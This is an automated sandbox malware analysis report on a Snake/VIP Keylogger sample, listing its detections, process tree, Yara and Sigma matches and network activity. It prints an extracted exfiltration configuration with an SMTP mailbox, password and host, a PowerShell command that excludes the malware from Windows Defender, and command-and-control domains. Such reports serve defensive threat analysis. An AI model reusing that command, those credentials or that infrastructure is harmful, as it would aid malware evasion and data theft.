Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Analysis ID:	1518592
MD5:	48977f1b641a9a3d88329ac470152381
SHA1:	d0eb9734f9bdeb6ab50ccad4342f92f4d405d2f0
SHA256:	1c829d80809fb2b5f7c2b40cf05064765bf237f655c9ca557e2d5a01f52b4bc6
Tags:	exeMassLogger
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe" MD5: 48977F1B641A9A3D88329AC470152381)

powershell.exe (PID: 7584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7820 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe" MD5: 48977F1B641A9A3D88329AC470152381)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "defounderlog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "defounderlog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbd4c8:$a1: get_encryptedPassword 0x1002e8:$a1: get_encryptedPassword 0x255b40:$a1: get_encryptedPassword 0xbda50:$a2: get_encryptedUsername 0x100870:$a2: get_encryptedUsername 0x2560c8:$a2: get_encryptedUsername 0xbd13b:$a3: get_timePasswordChanged 0xfff5b:$a3: get_timePasswordChanged 0x2557b3:$a3: get_timePasswordChanged 0xbd252:$a4: get_passwordField 0x100072:$a4: get_passwordField 0x2558ca:$a4: get_passwordField 0xbd4de:$a5: set_encryptedPassword 0x1002fe:$a5: set_encryptedPassword 0x255b56:$a5: set_encryptedPassword 0xc01fa:$a6: get_passwords 0x10301a:$a6: get_passwords 0x258872:$a6: get_passwords 0xc058e:$a7: get_logins 0x1033ae:$a7: get_logins 0x258c06:$a7: get_logins
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x45336:$a1: get_encryptedPassword 0x458b4:$a2: get_encryptedUsername 0x44fb8:$a3: get_timePasswordChanged 0x450cf:$a4: get_passwordField 0x4534c:$a5: set_encryptedPassword 0x48010:$a6: get_passwords 0x483a0:$a7: get_logins 0x47ffc:$a8: GetOutlookPasswords 0x479b5:$a9: StartKeylogger 0x482f9:$a10: KeyLoggerEventArgs 0x47a55:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x89231:$a1: get_encryptedPassword 0x897af:$a2: get_encryptedUsername 0x88eb3:$a3: get_timePasswordChanged 0x88fca:$a4: get_passwordField 0x89247:$a5: set_encryptedPassword 0x8bf0b:$a6: get_passwords 0x8c29b:$a7: get_logins 0x8bef7:$a8: GetOutlookPasswords 0x8b8b0:$a9: StartKeylogger 0x8c1f4:$a10: KeyLoggerEventArgs 0x8b950:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b81:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dde:$a4: \Orbitum\User Data\Default\Login Data 0x397bd:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b81:$a3: \Google\Chrome\User Data\Default\Login Data 0x38dde:$a4: \Orbitum\User Data\Default\Login Data 0x397bd:$a5: \Kometa\User Data\Default\Login Data
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a981:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abde:$a4: \Orbitum\User Data\Default\Login Data 0x3b5bd:$a5: \Kometa\User Data\Default\Login Data
5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x1c6318:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x1c68a0:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x1c5f8b:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x1c60a2:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x1c632e:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x1c904a:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x1c93de:$a7: get_logins
0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x1c76dc:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x1c76e3:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x1c76eb:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook 0x1c76f8:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ParentProcessId: 7412, ParentProcessName: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ProcessId: 7584, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ParentProcessId: 7412, ParentProcessName: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe", ProcessId: 7584, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T21:54:22.614687+0200	2803305	3	Unknown Traffic	192.168.2.7	49706	188.114.97.3	443	TCP
2024-09-25T21:54:25.392729+0200	2803305	3	Unknown Traffic	192.168.2.7	49712	188.114.97.3	443	TCP
2024-09-25T21:54:28.112281+0200	2803305	3	Unknown Traffic	192.168.2.7	49716	188.114.97.3	443	TCP
2024-09-25T21:54:31.873030+0200	2803305	3	Unknown Traffic	192.168.2.7	49722	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T21:54:21.022131+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49703	193.122.6.168	80	TCP
2024-09-25T21:54:22.069011+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49703	193.122.6.168	80	TCP
2024-09-25T21:54:23.553376+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49708	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "defounderlog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "defounderlog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "cp1.virtualine.org", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49723 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: VZLk.pdb source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source:	Binary string: VZLk.pdbSHA256 source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 0169F8E9h	5_2_0169F631
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 0169FD41h	5_2_0169FA88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DB31E0h	5_2_06DB2DC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DB0D0Dh	5_2_06DB0B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DB1697h	5_2_06DB0B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DB2C19h	5_2_06DB2968
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBE959h	5_2_06DBE6B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBE0A9h	5_2_06DBDE00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBF209h	5_2_06DBEF60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBCF49h	5_2_06DBCCA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DB31E0h	5_2_06DB2DC3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBD7F9h	5_2_06DBD550
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBE501h	5_2_06DBE258
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBF661h	5_2_06DBF3B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBEDB1h	5_2_06DBEB08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBD3A1h	5_2_06DBD0F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_06DB0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBFAB9h	5_2_06DBF810
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DBDC51h	5_2_06DBD9A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 4x nop then jmp 06DB31E0h	5_2_06DB310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
